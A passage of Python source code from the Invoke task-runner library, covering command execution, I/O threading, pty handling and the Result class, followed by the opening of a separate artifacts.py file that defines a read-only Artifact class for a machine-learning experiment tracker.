If ``False``, will disable stdin mirroring entirely (though other
functionality which writes to the subprocess' stdin, such as
autoresponding, will still function.) Disabling stdin mirroring can
help when ``sys.stdin`` is a misbehaving non-stream object, such as
under test harnesses or headless command runners.
:param watchers:
A list of `.StreamWatcher` instances which will be used to scan the
program's ``stdout`` or ``stderr`` and may write into its ``stdin``
(typically ``str`` or ``bytes`` objects depending on Python
version) in response to patterns or other heuristics.
See :doc:`/concepts/watchers` for details on this functionality.
Default: ``[]``.
:param bool echo_stdin:
Whether to write data from ``in_stream`` back to ``out_stream``.
In other words, in normal interactive usage, this parameter
controls whether Invoke mirrors what you type back to your
terminal.
By default (when ``None``), this behavior is triggered by the
following:
* Not using a pty to run the subcommand (i.e. ``pty=False``),
as ptys natively echo stdin to stdout on their own;
* And when the controlling terminal of Invoke itself (as per
``in_stream``) appears to be a valid terminal device or TTY.
(Specifically, when `~invoke.util.isatty` yields a ``True``
result when given ``in_stream``.)
.. note::
This property tends to be ``False`` when piping another
program's output into an Invoke session, or when running
Invoke within another program (e.g. running Invoke from
itself).
If both of those properties are true, echoing will occur; if either
is false, no echoing will be performed.
When not ``None``, this parameter will override that auto-detection
and force, or disable, echoing.
:param timeout:
Cause the runner to submit an interrupt to the subprocess and raise
`CommandTimedOut`, if the command takes longer than ``timeout``
seconds to execute. Defaults to ``None``, meaning no timeout.
.. versionadded:: 1.3
:returns:
`Result`, or a subclass thereof.
:raises:
`.UnexpectedExit`, if the command exited nonzero and
``warn`` was ``False``.
:raises:
`.Failure`, if the command didn't even exit cleanly, e.g. if a
`.StreamWatcher` raised `.WatcherError`.
:raises:
`.ThreadException` (if the background I/O threads encountered
exceptions other than `.WatcherError`).
.. versionadded:: 1.0
"""
try:
return self._run_body(command, **kwargs)
finally:
self.stop()
self.stop_timer()
def _run_body(self, command, **kwargs):
# Normalize kwargs w/ config
opts, out_stream, err_stream, in_stream = self._run_opts(kwargs)
shell = opts["shell"]
# Environment setup
env = self.generate_env(opts["env"], opts["replace_env"])
# Echo running command
if opts["echo"]:
print("\033[1;37m{}\033[0m".format(command))
# If dry-run, stop here.
if opts["dry"]:
return self.generate_result(
command=command,
stdout="",
stderr="",
exited=0,
pty=self.using_pty,
)
# Start executing the actual command (runs in background)
self.start(command, shell, env)
self.start_timer(opts["timeout"])
# Arrive at final encoding if neither config nor kwargs had one
self.encoding = opts["encoding"] or self.default_encoding()
# Set up IO thread parameters (format - body_func: {kwargs})
stdout, stderr = [], []
thread_args = {
self.handle_stdout: {
"buffer_": stdout,
"hide": "stdout" in opts["hide"],
"output": out_stream,
}
}
# After opt processing above, in_stream will be a real stream obj or
# False, so we can truth-test it. We don't even create a stdin-handling
# thread if it's False, meaning user indicated stdin is nonexistent or
# problematic.
if in_stream:
thread_args[self.handle_stdin] = {
"input_": in_stream,
"output": out_stream,
"echo": opts["echo_stdin"],
}
if not self.using_pty:
thread_args[self.handle_stderr] = {
"buffer_": stderr,
"hide": "stderr" in opts["hide"],
"output": err_stream,
}
# Kick off IO threads
self.threads = {}
exceptions = []
for target, kwargs in six.iteritems(thread_args):
t = ExceptionHandlingThread(target=target, kwargs=kwargs)
self.threads[target] = t
t.start()
# Wait for completion, then tie things off & obtain result
# And make sure we perform that tying off even if things asplode.
exception = None
while True:
try:
self.wait()
break # done waiting!
# NOTE: we handle all this now instead of at
# actual-exception-handling time because otherwise the stdout/err
# reader threads may block until the subprocess exits.
# TODO: honor other signals sent to our own process and transmit
# them to the subprocess before handling 'normally'.
except KeyboardInterrupt as e:
self.send_interrupt(e)
# NOTE: no break; we want to return to self.wait() since we
# can't know if subprocess is actually terminating due to this
# or not (think REPLs-within-shells, editors, other interactive
# use cases)
except BaseException as e: # Want to handle SystemExit etc still
# Store exception for post-shutdown reraise
exception = e
# Break out of return-to-wait() loop - we want to shut down
break
# Inform stdin-mirroring worker to stop its eternal looping
self.program_finished.set()
# Join threads, setting a timeout if necessary
for target, thread in six.iteritems(self.threads):
thread.join(self._thread_join_timeout(target))
e = thread.exception()
if e is not None:
exceptions.append(e)
# If we got a main-thread exception while wait()ing, raise it now that
# we've closed our worker threads.
if exception is not None:
raise exception
# Strip out WatcherError from any thread exceptions; they are bundled
# into Failure handling at the end.
watcher_errors = []
thread_exceptions = []
for exception in exceptions:
real = exception.value
if isinstance(real, WatcherError):
watcher_errors.append(real)
else:
thread_exceptions.append(exception)
# If any exceptions appeared inside the threads, raise them now as an
# aggregate exception object.
if thread_exceptions:
raise ThreadException(thread_exceptions)
# At this point, we had enough success that we want to be returning or
# raising detailed info about our execution; so we generate a Result.
stdout = "".join(stdout)
stderr = "".join(stderr)
if WINDOWS:
# "Universal newlines" - replace all standard forms of
# newline with \n. This is not technically Windows related
# (\r as newline is an old Mac convention) but we only apply
# the translation for Windows as that's the only platform
# it is likely to matter for these days.
stdout = stdout.replace("\r\n", "\n").replace("\r", "\n")
stderr = stderr.replace("\r\n", "\n").replace("\r", "\n")
# Get return/exit code, unless there were WatcherErrors to handle.
# NOTE: In that case, returncode() may block waiting on the process
# (which may be waiting for user input). Since most WatcherError
# situations lack a useful exit code anyways, skipping this doesn't
# really hurt any.
exited = None if watcher_errors else self.returncode()
# Obtain actual result
result = self.generate_result(
command=command,
shell=shell,
env=env,
stdout=stdout,
stderr=stderr,
exited=exited,
pty=self.using_pty,
hide=opts["hide"],
encoding=self.encoding,
)
# Any presence of WatcherError from the threads indicates a watcher was
# upset and aborted execution; make a generic Failure out of it and
# raise that.
if watcher_errors:
# TODO: ambiguity exists if we somehow get WatcherError in *both*
# threads...as unlikely as that would normally be.
raise Failure(result, reason=watcher_errors[0])
# If a timeout was requested and the subprocess did time out, shout.
timeout = opts["timeout"]
if timeout is not None and self.timed_out:
raise CommandTimedOut(result, timeout=timeout)
if not (result or opts["warn"]):
raise UnexpectedExit(result)
return result
def _run_opts(self, kwargs):
"""
Unify `run` kwargs with config options to arrive at local options.
:returns:
Four-tuple of ``(opts_dict, stdout_stream, stderr_stream,
stdin_stream)``.
"""
opts = {}
for key, value in six.iteritems(self.context.config.run):
runtime = kwargs.pop(key, None)
opts[key] = value if runtime is None else runtime
# Pull in command execution timeout, which stores config elsewhere,
# but only use it if it's actually set (backwards compat)
config_timeout = self.context.config.timeouts.command
opts["timeout"] = kwargs.pop("timeout", config_timeout)
# Handle invalid kwarg keys (anything left in kwargs).
# Act like a normal function would, i.e. TypeError
if kwargs:
err = "run() got an unexpected keyword argument '{}'"
raise TypeError(err.format(list(kwargs.keys())[0]))
# If hide was True, turn off echoing
if opts["hide"] is True:
opts["echo"] = False
# Conversely, ensure echoing is always on when dry-running
if opts["dry"] is True:
opts["echo"] = True
# Then normalize 'hide' from one of the various valid input values,
# into a stream-names tuple.
opts["hide"] = normalize_hide(opts["hide"])
# Derive stream objects
out_stream = opts["out_stream"]
if out_stream is None:
out_stream = sys.stdout
err_stream = opts["err_stream"]
if err_stream is None:
err_stream = sys.stderr
in_stream = opts["in_stream"]
if in_stream is None:
in_stream = sys.stdin
# Determine pty or no
self.using_pty = self.should_use_pty(opts["pty"], opts["fallback"])
if opts["watchers"]:
self.watchers = opts["watchers"]
return opts, out_stream, err_stream, in_stream
def _thread_join_timeout(self, target):
# Add a timeout to out/err thread joins when it looks like they're not
# dead but their counterpart is dead; this indicates issue #351 (fixed
# by #432) where the subproc may hang because its stdout (or stderr) is
# no longer being consumed by the dead thread (and a pipe is filling
# up.) In that case, the non-dead thread is likely to block forever on
# a `recv` unless we add this timeout.
if target == self.handle_stdin:
return None
opposite = self.handle_stderr
if target == self.handle_stderr:
opposite = self.handle_stdout
if opposite in self.threads and self.threads[opposite].is_dead:
return 1
return None
def generate_result(self, **kwargs):
"""
Create & return a suitable `Result` instance from the given ``kwargs``.
Subclasses may wish to override this in order to manipulate things or
generate a `Result` subclass (e.g. ones containing additional metadata
besides the default).
.. versionadded:: 1.0
"""
return Result(**kwargs)
def read_proc_output(self, reader):
"""
Iteratively read & decode bytes from a subprocess' out/err stream.
:param reader:
A literal reader function/partial, wrapping the actual stream
object in question, which takes a number of bytes to read, and
returns that many bytes (or ``None``).
``reader`` should be a reference to either `read_proc_stdout` or
`read_proc_stderr`, which perform the actual, platform/library
specific read calls.
:returns:
A generator yielding Unicode strings (`unicode` on Python 2; `str`
on Python 3).
Specifically, each resulting string is the result of decoding
`read_chunk_size` bytes read from the subprocess' out/err stream.
.. versionadded:: 1.0
"""
# NOTE: Typically, reading from any stdout/err (local, remote or
# otherwise) can be thought of as "read until you get nothing back".
# This is preferable over "wait until an out-of-band signal claims the
# process is done running" because sometimes that signal will appear
# before we've actually read all the data in the stream (i.e.: a race
# condition).
while True:
data = reader(self.read_chunk_size)
if not data:
break
yield self.decode(data)
def write_our_output(self, stream, string):
"""
Write ``string`` to ``stream``.
Also calls ``.flush()`` on ``stream`` to ensure that real terminal
streams don't buffer.
:param stream:
A file-like stream object, mapping to the ``out_stream`` or
``err_stream`` parameters of `run`.
:param string: A Unicode string object.
:returns: ``None``.
.. versionadded:: 1.0
"""
stream.write(encode_output(string, self.encoding))
stream.flush()
def _handle_output(self, buffer_, hide, output, reader):
# TODO: store un-decoded/raw bytes somewhere as well...
for data in self.read_proc_output(reader):
# Echo to local stdout if necessary
# TODO: should we rephrase this as "if you want to hide, give me a
# dummy output stream, e.g. something like /dev/null"? Otherwise, a
# combo of 'hide=stdout' + 'here is an explicit out_stream' means
# out_stream is never written to, and that seems...odd.
if not hide:
self.write_our_output(stream=output, string=data)
# Store in shared buffer so main thread can do things with the
# result after execution completes.
# NOTE: this is threadsafe insofar as no reading occurs until after
# the thread is join()'d.
buffer_.append(data)
# Run our specific buffer through the autoresponder framework
self.respond(buffer_)
def handle_stdout(self, buffer_, hide, output):
"""
Read process' stdout, storing into a buffer & printing/parsing.
Intended for use as a thread target. Only terminates when all stdout
from the subprocess has been read.
:param buffer_: The capture buffer shared with the main thread.
:param bool hide: Whether or not to replay data into ``output``.
:param output:
Output stream (file-like object) to write data into when not
hiding.
:returns: ``None``.
.. versionadded:: 1.0
"""
self._handle_output(
buffer_, hide, output, reader=self.read_proc_stdout
)
def handle_stderr(self, buffer_, hide, output):
"""
Read process' stderr, storing into a buffer & printing/parsing.
Identical to `handle_stdout` except for the stream read from; see its
docstring for API details.
.. versionadded:: 1.0
"""
self._handle_output(
buffer_, hide, output, reader=self.read_proc_stderr
)
def read_our_stdin(self, input_):
"""
Read & decode bytes from a local stdin stream.
:param input_:
Actual stream object to read from. Maps to ``in_stream`` in `run`,
so will often be ``sys.stdin``, but might be any stream-like
object.
:returns:
A Unicode string, the result of decoding the read bytes (this might
be the empty string if the pipe has closed/reached EOF); or
``None`` if stdin wasn't ready for reading yet.
.. versionadded:: 1.0
"""
# TODO: consider moving the character_buffered contextmanager call in
# here? Downside is it would be flipping those switches for every byte
# read instead of once per session, which could be costly (?).
bytes_ = None
if ready_for_reading(input_):
bytes_ = input_.read(bytes_to_read(input_))
# Decode if it appears to be binary-type. (From real terminal
# streams, usually yes; from file-like objects, often no.)
if bytes_ and isinstance(bytes_, six.binary_type):
# TODO: will decoding 1 byte at a time break multibyte
# character encodings? How to square interactivity with that?
bytes_ = self.decode(bytes_)
return bytes_
def handle_stdin(self, input_, output, echo):
"""
Read local stdin, copying into process' stdin as necessary.
Intended for use as a thread target.
.. note::
Because real terminal stdin streams have no well-defined "end", if
such a stream is detected (based on existence of a callable
``.fileno()``) this method will wait until `program_finished` is
set, before terminating.
When the stream doesn't appear to be from a terminal, the same
semantics as `handle_stdout` are used - the stream is simply
``read()`` from until it returns an empty value.
:param input_: Stream (file-like object) from which to read.
:param output: Stream (file-like object) to which echoing may occur.
:param bool echo: User override option for stdin-stdout echoing.
:returns: ``None``.
.. versionadded:: 1.0
"""
# TODO: reinstate lock/whatever thread logic from fab v1 which prevents
# reading from stdin while other parts of the code are prompting for
# runtime passwords? (search for 'input_enabled')
# TODO: fabric#1339 is strongly related to this, if it's not literally
# exposing some regression in Fabric 1.x itself.
closed_stdin = False
with character_buffered(input_):
while True:
data = self.read_our_stdin(input_)
if data:
# Mirror what we just read to process' stdin.
# We perform an encode so Python 3 gets bytes (streams +
# str's in Python 3 == no bueno) but skip the decode step,
# since there's presumably no need (nobody's interacting
# with this data programmatically).
self.write_proc_stdin(data)
# Also echo it back to local stdout (or whatever
# out_stream is set to) when necessary.
if echo is None:
echo = self.should_echo_stdin(input_, output)
if echo:
self.write_our_output(stream=output, string=data)
# Empty string/char/byte != None. Can't just use 'else' here.
elif data is not None:
# When reading from file-like objects that aren't "real"
# terminal streams, an empty byte signals EOF.
if not self.using_pty and not closed_stdin:
self.close_proc_stdin()
closed_stdin = True
# Dual all-done signals: program being executed is done
# running, *and* we don't seem to be reading anything out of
# stdin. (NOTE: If we only test the former, we may encounter
# race conditions re: unread stdin.)
if self.program_finished.is_set() and not data:
break
# Take a nap so we're not chewing CPU.
time.sleep(self.input_sleep)
def should_echo_stdin(self, input_, output):
"""
Determine whether data read from ``input_`` should echo to ``output``.
Used by `handle_stdin`; tests attributes of ``input_`` and ``output``.
:param input_: Input stream (file-like object).
:param output: Output stream (file-like object).
:returns: A ``bool``.
.. versionadded:: 1.0
"""
return (not self.using_pty) and isatty(input_)
def respond(self, buffer_):
"""
Write to the program's stdin in response to patterns in ``buffer_``.
The patterns and responses are driven by the `.StreamWatcher` instances
from the ``watchers`` kwarg of `run` - see :doc:`/concepts/watchers`
for a conceptual overview.
:param buffer:
The capture buffer for this thread's particular IO stream.
:returns: ``None``.
.. versionadded:: 1.0
"""
# Join buffer contents into a single string; without this,
# StreamWatcher subclasses can't do things like iteratively scan for
# pattern matches.
# NOTE: using string.join should be "efficient enough" for now, re:
# speed and memory use. Should that become false, consider using
# StringIO or cStringIO (tho the latter doesn't do Unicode well?) which
# is apparently even more efficient.
stream = u"".join(buffer_)
for watcher in self.watchers:
for response in watcher.submit(stream):
self.write_proc_stdin(response)
def generate_env(self, env, replace_env):
"""
Return a suitable environment dict based on user input & behavior.
:param dict env: Dict supplying overrides or full env, depending.
:param bool replace_env:
Whether ``env`` updates, or is used in place of, the value of
`os.environ`.
:returns: A dictionary of shell environment vars.
.. versionadded:: 1.0
"""
return env if replace_env else dict(os.environ, **env)
def should_use_pty(self, pty, fallback):
"""
Should execution attempt to use a pseudo-terminal?
:param bool pty:
Whether the user explicitly asked for a pty.
:param bool fallback:
Whether falling back to non-pty execution should be allowed, in
situations where ``pty=True`` but a pty could not be allocated.
.. versionadded:: 1.0
"""
# NOTE: fallback not used: no falling back implemented by default.
return pty
@property
def has_dead_threads(self):
"""
Detect whether any IO threads appear to have terminated unexpectedly.
Used during process-completion waiting (in `wait`) to ensure we don't
deadlock our child process if our IO processing threads have
errored/died.
:returns:
``True`` if any threads appear to have terminated with an
exception, ``False`` otherwise.
.. versionadded:: 1.0
"""
return any(x.is_dead for x in self.threads.values())
def wait(self):
"""
Block until the running command appears to have exited.
:returns: ``None``.
.. versionadded:: 1.0
"""
while True:
proc_finished = self.process_is_finished
dead_threads = self.has_dead_threads
if proc_finished or dead_threads:
break
time.sleep(self.input_sleep)
def write_proc_stdin(self, data):
"""
Write encoded ``data`` to the running process' stdin.
:param data: A Unicode string.
:returns: ``None``.
.. versionadded:: 1.0
"""
# Encode always, then request implementing subclass to perform the
# actual write to subprocess' stdin.
self._write_proc_stdin(data.encode(self.encoding))
def decode(self, data):
"""
Decode some ``data`` bytes, returning Unicode.
.. versionadded:: 1.0
"""
# NOTE: yes, this is a 1-liner. The point is to make it much harder to
# forget to use 'replace' when decoding :)
return data.decode(self.encoding, "replace")
@property
def process_is_finished(self):
"""
Determine whether our subprocess has terminated.
.. note::
The implementation of this method should be nonblocking, as it is
used within a query/poll loop.
:returns:
``True`` if the subprocess has finished running, ``False``
otherwise.
.. versionadded:: 1.0
"""
raise NotImplementedError
def start(self, command, shell, env):
"""
Initiate execution of ``command`` (via ``shell``, with ``env``).
Typically this means use of a forked subprocess or requesting start of
execution on a remote system.
In most cases, this method will also set subclass-specific member
variables used in other methods such as `wait` and/or `returncode`.
:param str command:
Command string to execute.
:param str shell:
Shell to use when executing ``command``.
:param dict env:
Environment dict used to prep shell environment.
.. versionadded:: 1.0
"""
raise NotImplementedError
def start_timer(self, timeout):
"""
Start a timer to `kill` our subprocess after ``timeout`` seconds.
"""
if timeout is not None:
self._timer = threading.Timer(timeout, self.kill)
self._timer.start()
def read_proc_stdout(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stdout stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
.. versionadded:: 1.0
"""
raise NotImplementedError
def read_proc_stderr(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stderr stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
.. versionadded:: 1.0
"""
raise NotImplementedError
def _write_proc_stdin(self, data):
"""
Write ``data`` to running process' stdin.
This should never be called directly; it's for subclasses to implement.
See `write_proc_stdin` for the public API call.
:param data: Already-encoded byte data suitable for writing.
:returns: ``None``.
.. versionadded:: 1.0
"""
raise NotImplementedError
def close_proc_stdin(self):
"""
Close running process' stdin.
:returns: ``None``.
.. versionadded:: 1.3
"""
raise NotImplementedError
def default_encoding(self):
"""
Return a string naming the expected encoding of subprocess streams.
This return value should be suitable for use by encode/decode methods.
.. versionadded:: 1.0
"""
# TODO: probably wants to be 2 methods, one for local and one for
# subprocess. For now, good enough to assume both are the same.
return default_encoding()
def send_interrupt(self, interrupt):
"""
Submit an interrupt signal to the running subprocess.
In almost all implementations, the default behavior is what will be
desired: submit ``\x03`` to the subprocess' stdin pipe. However, we
leave this as a public method in case this default needs to be
augmented or replaced.
:param interrupt:
The locally-sourced ``KeyboardInterrupt`` causing the method call.
:returns: ``None``.
.. versionadded:: 1.0
"""
self.write_proc_stdin(u"\x03")
def returncode(self):
"""
Return the numeric return/exit code resulting from command execution.
:returns: `int`
.. versionadded:: 1.0
"""
raise NotImplementedError
def stop(self):
"""
Perform final cleanup, if necessary.
This method is called within a ``finally`` clause inside the main `run`
method. Depending on the subclass, it may be a no-op, or it may do
things such as close network connections or open files.
:returns: ``None``
.. versionadded:: 1.0
"""
raise NotImplementedError
def stop_timer(self):
"""
Cancel an open timeout timer, if required.
"""
# TODO 2.0: merge with stop() (i.e. make stop() something users extend
# and call super() in, instead of completely overriding, then just move
# this into the default implementation of stop().
# TODO: this
if self._timer:
self._timer.cancel()
def kill(self):
"""
Forcibly terminate the subprocess.
Typically only used by the timeout functionality.
This is often a "best-effort" attempt, e.g. remote subprocesses often
must settle for simply shutting down the local side of the network
connection and hoping the remote end eventually gets the message.
"""
raise NotImplementedError
@property
def timed_out(self):
"""
Returns ``True`` if the subprocess stopped because it timed out.
.. versionadded:: 1.3
"""
# Timer expiry implies we did time out. (The timer itself will have
# killed the subprocess, allowing us to even get to this point.)
return self._timer and not self._timer.is_alive()
class Local(Runner):
"""
Execute a command on the local system in a subprocess.
.. note::
When Invoke itself is executed without a controlling terminal (e.g.
when ``sys.stdin`` lacks a useful ``fileno``), it's not possible to
present a handle on our PTY to local subprocesses. In such situations,
`Local` will fallback to behaving as if ``pty=False`` (on the theory
that degraded execution is better than none at all) as well as printing
a warning to stderr.
To disable this behavior, say ``fallback=False``.
.. versionadded:: 1.0
"""
def __init__(self, context):
super(Local, self).__init__(context)
# Bookkeeping var for pty use case
self.status = None
def should_use_pty(self, pty=False, fallback=True):
use_pty = False
if pty:
use_pty = True
# TODO: pass in & test in_stream, not sys.stdin
if not has_fileno(sys.stdin) and fallback:
if not self.warned_about_pty_fallback:
err = "WARNING: stdin has no fileno; falling back to non-pty execution!\n" # noqa
sys.stderr.write(err)
self.warned_about_pty_fallback = True
use_pty = False
return use_pty
def read_proc_stdout(self, num_bytes):
# Obtain useful read-some-bytes function
if self.using_pty:
# Need to handle spurious OSErrors on some Linux platforms.
try:
data = os.read(self.parent_fd, num_bytes)
except OSError as e:
# Only eat I/O specific OSErrors so we don't hide others
stringified = str(e)
io_errors = (
# The typical default
"Input/output error",
# Some less common platforms phrase it this way
"I/O error",
)
if not any(error in stringified for error in io_errors):
raise
# The bad OSErrors happen after all expected output has
# appeared, so we return a falsey value, which triggers the
# "end of output" logic in code using reader functions.
data = None
else:
data = os.read(self.process.stdout.fileno(), num_bytes)
return data
def read_proc_stderr(self, num_bytes):
# NOTE: when using a pty, this will never be called.
# TODO: do we ever get those OSErrors on stderr? Feels like we could?
return os.read(self.process.stderr.fileno(), num_bytes)
def _write_proc_stdin(self, data):
# NOTE: parent_fd from os.fork() is a read/write pipe attached to our
# forked process' stdout/stdin, respectively.
fd = self.parent_fd if self.using_pty else self.process.stdin.fileno()
# Try to write, ignoring broken pipes if encountered (implies child
# process exited before the process piping stdin to us finished;
# there's nothing we can do about that!)
try:
return os.write(fd, data)
except OSError as e:
if "Broken pipe" not in str(e):
raise
def close_proc_stdin(self):
if self.using_pty:
# there is no working scenario to tell the process that stdin
# closed when using pty
raise SubprocessPipeError("Cannot close stdin when pty=True")
self.process.stdin.close()
def start(self, command, shell, env):
if self.using_pty:
if pty is None: # Encountered ImportError
err = "You indicated pty=True, but your platform doesn't support the 'pty' module!" # noqa
sys.exit(err)
cols, rows = pty_size()
self.pid, self.parent_fd = pty.fork()
# If we're the child process, load up the actual command in a
# shell, just as subprocess does; this replaces our process - whose
# pipes are all hooked up to the PTY - with the "real" one.
if self.pid == 0:
# TODO: both pty.spawn() and pexpect.spawn() do a lot of
# setup/teardown involving tty.setraw, getrlimit, signal.
# Ostensibly we'll want some of that eventually, but if
# possible write tests - integration-level if necessary -
# before adding it!
#
# Set pty window size based on what our own controlling
# terminal's window size appears to be.
# TODO: make subroutine?
winsize = struct.pack("HHHH", rows, cols, 0, 0)
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCSWINSZ, winsize)
# Use execve for bare-minimum "exec w/ variable # args + env"
# behavior. No need for the 'p' (use PATH to find executable)
# for now.
# TODO: see if subprocess is using equivalent of execvp...
os.execve(shell, [shell, "-c", command], env)
else:
self.process = Popen(
command,
shell=True,
executable=shell,
env=env,
stdout=PIPE,
stderr=PIPE,
stdin=PIPE,
)
def kill(self):
pid = self.pid if self.using_pty else self.process.pid
os.kill(pid, signal.SIGKILL)
@property
def process_is_finished(self):
if self.using_pty:
# NOTE:
# https://github.com/pexpect/ptyprocess/blob/4058faa05e2940662ab6da1330aa0586c6f9cd9c/ptyprocess/ptyprocess.py#L680-L687
# implies that Linux "requires" use of the blocking, non-WNOHANG
# version of this call. Our testing doesn't verify this, however,
# so...
# NOTE: It does appear to be totally blocking on Windows, so our
# issue #351 may be totally unsolvable there. Unclear.
pid_val, self.status = os.waitpid(self.pid, os.WNOHANG)
return pid_val != 0
else:
return self.process.poll() is not None
def returncode(self):
if self.using_pty:
# No subprocess.returncode available; use WIFEXITED/WIFSIGNALED to
# determine whch of WEXITSTATUS / WTERMSIG to use.
# TODO: is it safe to just say "call all WEXITSTATUS/WTERMSIG and
# return whichever one of them is nondefault"? Probably not?
# NOTE: doing this in an arbitrary order should be safe since only
# one of the WIF* methods ought to ever return True.
code = None
if os.WIFEXITED(self.status):
code = os.WEXITSTATUS(self.status)
elif os.WIFSIGNALED(self.status):
code = os.WTERMSIG(self.status)
# Match subprocess.returncode by turning signals into negative
# 'exit code' integers.
code = -1 * code
return code
# TODO: do we care about WIFSTOPPED? Maybe someday?
else:
return self.process.returncode
def stop(self):
# No explicit close-out required (so far).
pass
class Result(object):
"""
A container for information about the result of a command execution.
All params are exposed as attributes of the same name and type.
:param str stdout:
The subprocess' standard output.
:param str stderr:
Same as ``stdout`` but containing standard error (unless the process
was invoked via a pty, in which case it will be empty; see
`.Runner.run`.)
:param str encoding:
The string encoding used by the local shell environment.
:param str command:
The command which was executed.
:param str shell:
The shell binary used for execution.
:param dict env:
The shell environment used for execution. (Default is the empty dict,
``{}``, not ``None`` as displayed in the signature.)
:param int exited:
An integer representing the subprocess' exit/return code.
.. note::
This may be ``None`` in situations where the subprocess did not run
to completion, such as when auto-responding failed or a timeout was
reached.
:param bool pty:
A boolean describing whether the subprocess was invoked with a pty or
not; see `.Runner.run`.
:param tuple hide:
A tuple of stream names (none, one or both of ``('stdout', 'stderr')``)
which were hidden from the user when the generating command executed;
this is a normalized value derived from the ``hide`` parameter of
`.Runner.run`.
For example, ``run('command', hide='stdout')`` will yield a `Result`
where ``result.hide == ('stdout',)``; ``hide=True`` or ``hide='both'``
results in ``result.hide == ('stdout', 'stderr')``; and ``hide=False``
(the default) generates ``result.hide == ()`` (the empty tuple.)
.. note::
`Result` objects' truth evaluation is equivalent to their `.ok`
attribute's value. Therefore, quick-and-dirty expressions like the
following are possible::
if run("some shell command"):
do_something()
else:
handle_problem()
However, remember `Zen of Python #2
<http://zen-of-python.info/explicit-is-better-than-implicit.html#2>`_.
.. versionadded:: 1.0
"""
# TODO: inherit from namedtuple instead? heh (or: use attrs from pypi)
def __init__(
self,
stdout="",
stderr="",
encoding=None,
command="",
shell="",
env=None,
exited=0,
pty=False,
hide=tuple(),
):
self.stdout = stdout
self.stderr = stderr
if encoding is None:
encoding = default_encoding()
self.encoding = encoding
self.command = command
self.shell = shell
self.env = {} if env is None else env
self.exited = exited
self.pty = pty
self.hide = hide
@property
def return_code(self):
"""
An alias for ``.exited``.
.. versionadded:: 1.0
"""
return self.exited
def __nonzero__(self):
# NOTE: This is the method that (under Python 2) determines Boolean
# behavior for objects.
return self.ok
def __bool__(self):
# NOTE: And this is the Python 3 equivalent of __nonzero__. Much better
# name...
return self.__nonzero__()
def __str__(self):
if self.exited is not None:
desc = "Command exited with status {}.".format(self.exited)
else:
desc = "Command was not fully executed due to watcher error."
ret = [desc]
for x in ("stdout", "stderr"):
val = getattr(self, x)
ret.append(
u"""=== {} ===
{}
""".format(
x, val.rstrip()
)
if val
else u"(no {})".format(x)
)
return u"\n".join(ret)
def __repr__(self):
# TODO: more? e.g. len of stdout/err? (how to represent cleanly in a
# 'x=y' format like this? e.g. '4b' is ambiguous as to what it
# represents
template = "<Result cmd={!r} exited={}>"
return template.format(self.command, self.exited)
@property
def ok(self):
"""
A boolean equivalent to ``exited == 0``.
.. versionadded:: 1.0
"""
return self.exited == 0
@property
def failed(self):
"""
The inverse of ``ok``.
I.e., ``True`` if the program exited with a nonzero return code, and
``False`` otherwise.
.. versionadded:: 1.0
"""
return not self.ok
def tail(self, stream, count=10):
"""
Return the last ``count`` lines of ``stream``, plus leading whitespace.
:param str stream:
Name of some captured stream attribute, eg ``"stdout"``.
:param int count:
Number of lines to preserve.
.. versionadded:: 1.3
"""
# TODO: preserve alternate line endings? Mehhhh
# NOTE: no trailing \n preservation; easier for below display if
# normalized
text = "\n\n" + "\n".join(getattr(self, stream).splitlines()[-count:])
return encode_output(text, self.encoding)
def normalize_hide(val):
hide_vals = (None, False, "out", "stdout", "err", "stderr", "both", True)
if val not in hide_vals:
err = "'hide' got {!r} which is not in {!r}"
raise ValueError(err.format(val, hide_vals))
if val in (None, False):
hide = ()
elif val in ("both", True):
hide = ("stdout", "stderr")
elif val == "out":
hide = ("stdout",)
elif val == "err":
hide = ("stderr",)
else:
hide = (val,)
return hide
def default_encoding():
"""
Obtain apparent interpreter-local default text encoding.
Often used as a baseline in situations where we must use SOME encoding for
unknown-but-presumably-text bytes, and the user has not specified an
override.
"""
# Based on some experiments there is an issue with
# `locale.getpreferredencoding(do_setlocale=False)` in Python 2.x on
# Linux and OS X, and `locale.getpreferredencoding(do_setlocale=True)`
# triggers some global state changes. (See #274 for discussion.)
encoding = locale.getpreferredencoding(False)
if six.PY2 and not WINDOWS:
default = locale.getdefaultlocale()[1]
if default is not None:
encoding = default
return encoding
|
artifacts.py
|
import hashlib
import json
import mimetypes
import os
import pickle
from six.moves.urllib.parse import quote
from copy import deepcopy
from datetime import datetime
from multiprocessing import RLock, Event
from multiprocessing.pool import ThreadPool
from tempfile import mkdtemp, mkstemp
from threading import Thread
from time import time
from zipfile import ZipFile, ZIP_DEFLATED
import humanfriendly
import six
from PIL import Image
from pathlib2 import Path
from six.moves.urllib.parse import urlparse
from typing import Dict, Union, Optional, Any, Sequence
from ..backend_api import Session
from ..backend_api.services import tasks
from ..backend_interface.metrics.events import UploadEvent
from ..debugging.log import LoggerRoot
from ..storage.helper import remote_driver_schemes
try:
import pandas as pd
DataFrame = pd.DataFrame
except ImportError:
pd = None
DataFrame = None
try:
import numpy as np
except ImportError:
np = None
try:
from pathlib import Path as pathlib_Path
except ImportError:
pathlib_Path = None
class Artifact(object):
"""
Read-Only Artifact object
"""
@property
def url(self):
# type: () -> str
"""
:return: The URL of uploaded artifact.
"""
return self._url
@property
def name(self):
# type: () -> str
"""
:return: The name of artifact.
"""
return self._name
@property
def size(self):
# type: () -> int
"""
:return: The size in bytes of artifact.
"""
return self._size
@property
def type(self):
# type: () -> str
"""
:return: The type (str) of of artifact.
"""
return self._type
@property
def mode(self):
# type: () -> Union["input", "output"] # noqa: F821
"""
:return: The mode (str) of of artifact: "input" or "output".
"""
return self._mode
@property
def hash(self):
# type: () -> str
"""
:return: SHA2 hash (str) of of artifact content.
"""
return self._hash
@property
def timestamp(self):
# type: () -> datetime
"""
:return: Timestamp (datetime) of uploaded artifact.
"""
return self._timestamp
@property
def metadata(self):
# type: () -> Optional[Dict[str, str]]
"""
:return: Key/Value dictionary attached to artifact.
"""
return self._metadata
@property
def preview(self):
# type: () -> str
"""
:return: A string (str) representation of the artifact.
"""
return self._preview
def __init__(self, artifact_api_object):
"""
construct read-only object from api artifact object
:param tasks.Artifact artifact_api_object:
"""
self._name = artifact_api_object.key
self._size = artifact_api_object.content_size
self._type = artifact_api_object.type
self._mode = artifact_api_object.mode
self._url = artifact_api_object.uri
